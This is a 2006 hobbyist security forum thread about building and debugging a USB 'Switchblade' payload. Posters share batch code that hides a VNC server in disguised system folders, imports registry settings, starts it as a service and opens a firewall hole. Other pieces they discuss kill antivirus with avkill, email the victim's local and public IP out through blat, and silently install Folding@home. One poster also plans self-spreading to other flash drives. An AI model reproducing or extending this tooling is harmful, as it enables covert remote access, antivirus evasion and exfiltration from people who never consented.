spektormax Posted October 15, 2006 Author Share Posted October 15, 2006 no prob, but ill do it tommororw (im relaly tired) Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 15, 2006 Author Share Posted October 15, 2006 Ok Ive put every thing in my payload into it: http://www.hak5.org/wiki/Switchblade_Packages Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 17, 2006 Author Share Posted October 17, 2006 feel free to add to it Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 18, 2006 Share Posted October 18, 2006 I cant seem to get the VNC portion to work.. Does anyone know what the hack is to just remove th eicon in the toolbar if vnc is already there Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 18, 2006 Author Share Posted October 18, 2006 I donno what it is ai grabed it form another place Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 18, 2006 Share Posted October 18, 2006 I just redownloaded it from the site and it looks like I have the right version. I was trying to add the auto ipsender now and it looks like it works...I add an ipconfig to get the local ip of the machine along with the whatismyip.com to get the Ip for one in my house that I am testing with... In my email I am only getting the first whatismyip.com file. I added mine to the email and it works if I run it manually..How can I change it to send the Ip Daily not every 30 minutes? Sample: for %%i in (ip.txt,c:iplocal.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 18, 2006 Author Share Posted October 18, 2006 eh I donno I dont haev resend on mine Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 18, 2006 Share Posted October 18, 2006 Ok so I am trying to debug this VNC installer and After the files are copied I get this: 18 file(s) copied. System error 3 has occurred. The system cannot find the path specified. Press any key to continue . . . ____ Im not sure if it can not find the net start winvnc or the nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd Quote Link to comment Share on other sites More sharing options...
Matt35 Posted October 18, 2006 Share Posted October 18, 2006 I moved my question to the following page, in it's own topic, please help! http://www.hak5.org/forums/viewtopic.php?p=41453#41453 --Matt Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 19, 2006 Share Posted October 19, 2006 Still working on VNC issue. I am using this: It is not strting the service I get a message that says it can not find it. It does not appear to be a valid service. However I can start it manually..also if I just put winvnc in the install file instead of net start vnc it starts but just hangs there mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn" cd ../VNCInstallFiles copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn" attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h regedit /s ../CMD/vncdmp.reg regedit /s ../CMD/vncdmp1.reg regedit /s ../CMD/vncdmp2.reg ping -n 1 localhost > nul net start WinVNC nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 19, 2006 Author Share Posted October 19, 2006 I dono what the problem is, I had no problem with it (though I did not test it cuz I dont want vnc anyware with the password yougothacked, Ill test it later in my vmware later and get back to you Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 19, 2006 Author Share Posted October 19, 2006 I have updated the antidote to also unisntall VNC (it didn't do so before) it now also properly uninstalls folding@Home vs being finished after restart. I have looked over the VNC thing, but have only dirty answers (I don't like using software that will show up on a virus scanner as I unfortuantly did with Folding (but avkill fixes that). With a little tool, I can install the service, however the little No-Icon hack isn't working for some reason. Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 19, 2006 Share Posted October 19, 2006 Ya I noticed that the icon still showed up when I started it manually. I have been trying to figure out what the hack is that is suppose to make it invisibile. Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 20, 2006 Author Share Posted October 20, 2006 after like 3 hours of work I found the issues the regiestry ORLWInVNC3 had to be WInVNc3. I took advantage of the fact that I was fixing stuff, to update avkill to the 1.2BETA version. I also redid the antidote just a tad so it cleans up a few more things. Warning, there are now 2 files that will try a virus scanner. They are the file used to start folding silently and the file used to install VNC as a service. Both are solved using avkill. If you don't use the avkill, disable VNC and Folding or you might get virus scanners that pop up and vell at you. Also inorder for folding to work, it installes he avkill as a service. this is very crusial that this works, (it won't show up in services.msc but it will show up in the runs in the registry) (yes I now I could have used this on VNC but first of all I'm not sure if it would work right and I dont have a year to do it and check, and secoudn since avkill is already tehre why not use it. Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 20, 2006 Share Posted October 20, 2006 Thanks for the VNC fix. I will try it later..on my way to work now..In the antidote what does csrss.exe do? Also Im trying to figure out what is the Folding@home hack... Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 20, 2006 Author Share Posted October 20, 2006 well, unforchunatly the only way I found to install vnc as a service was a program I foind on the net. The problem is that virus scanners trip. SO you have to run avkill to stop them and then use it. YOu have to use it to remove it as well, so antidoe avkills then it uninstalls and then it shutdowns avkill. Folding@home hack instal folding at hoem and folds for U3_zomvies team Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 20, 2006 Author Share Posted October 20, 2006 I fixed the problem in VNC now it will make a "hole" for itself thru windows firewall Quote Link to comment Share on other sites More sharing options...
keia71 Posted October 25, 2006 Share Posted October 25, 2006 Does the antidote work for VNC. I can't gret it to uninstall. It looks like it does not actually take away the vnc icon in the toolbar but it keeps the status looking the same so the user does not know that you are connected.... Can you tell me what all the VNC hack does? I want to change the password but it will not let me now. I will redownload and try the antidote again Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 25, 2006 Author Share Posted October 25, 2006 first of all VNC has been VASTLY redone in the last 2 weeks (so has the new antidot old one didnt uninstall vnc) THe anditote removes everythings, delets the firectorys, deletes teh registries, uninstalls the service, and cleans up all traces. The latest antidote removes VNC completly, for anyone else that has a problem, make sure you download the latest version. Next time I relses parts (if I do) Ill put a post. Also if you guys want something in the payload that isn't let me know and Ill make it (asuming I can and have the tiem to) Quote Link to comment Share on other sites More sharing options...
G-Stress Posted October 25, 2006 Share Posted October 25, 2006 @ spektormax I would like to know how you would go about modifying the hacksaw part of code to where when any future flash drives are plugged it, it copies the hacksaw payload to it, as well as does it's current job. It was mentioned that be possible in the last episode, but I've yet to see it mentioned here. It seems simple to do, but... if done wouldn't that drive need to be flashed also? That's where I think it could get complex. Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 25, 2006 Author Share Posted October 25, 2006 well 2 things 1 im wroking on that (in m head no real work yet) and 2 it woudl use the non U3 one that they woudl have to hit open on but wtill Quote Link to comment Share on other sites More sharing options...
G-Stress Posted October 25, 2006 Share Posted October 25, 2006 @ spektormax Gotcha, makes more sense also. I totally spaced the hacksaw on a non-U3. After as interesting and useful as your payload already is I'm shocked you haven't already added that... I got it, your not thinkin it in your head your commin back with something even more lethal and interesting ;) Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 26, 2006 Author Share Posted October 26, 2006 well 2 things that are an issue. 1 is that I cant get the dirve letter of the flash drive. Most likly I will just gra the drive letter when the drive is inserted and store it. And 2, I dont want skidies using it ot install thier little bots (you knwo what I mean) Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 28, 2006 Author Share Posted October 28, 2006 DOes any one know how to get the drive letter of a freshly insterted drive, (I dont have the MSVB 6.0 compiler) or perhaps just in hte sbs,exe add a strcpy, and copy the infro in hte dummy to the end of "send,bat" and shell execute that. THat woudl be enough for me to get it to work. edit: I figured out how to do it, production of ICBM has begun Quote Link to comment Share on other sites More sharing options...
Moo Posted October 29, 2006 Share Posted October 29, 2006 What exactly is on the ICBM? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.